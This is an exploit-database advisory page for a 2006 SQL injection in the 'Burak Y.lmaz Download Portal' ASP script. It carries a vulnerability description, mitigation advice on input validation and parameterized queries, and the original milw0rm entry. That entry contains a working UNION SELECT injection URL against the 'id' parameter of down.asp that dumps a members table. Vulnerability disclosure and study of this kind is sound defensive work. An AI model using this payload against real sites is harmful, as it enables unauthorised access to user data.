header-logo
Suggest Exploit
vendor:
Burak Y.lmaz Download Portal
by:
ShaFuck31
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Burak Y.lmaz Download Portal
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2006

Burak Y.lmaz Download Portal

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to '/ScriptPath/down.asp' script. A remote attacker can send a specially crafted request with malicious SQL statements to the vulnerable script and execute arbitrary SQL commands in application's database. This can allow the attacker to access or modify sensitive data in the database, compromise vulnerable system and launch further attacks.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before passing to the SQL statement. It is recommended to use of prepared statements (with parameterized queries) and stored procedures when working with SQL databases.
Source

Exploit-DB raw data:

# LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : Burak Y.lmaz Download Portal

# Script Download : http://maxiasp.com/sc_yorum.asp?scno=929

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : down.asp

#Vuln :
http://www.victim.com/ScriptPath/down.asp?id=[SqL]
http://www.victim.com/ScriptPath/down.asp?id=-1%20union%20SELECT%20*%20FROM%20uyeler%20WHERE%20uid=36

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

# milw0rm.com [2006-12-19]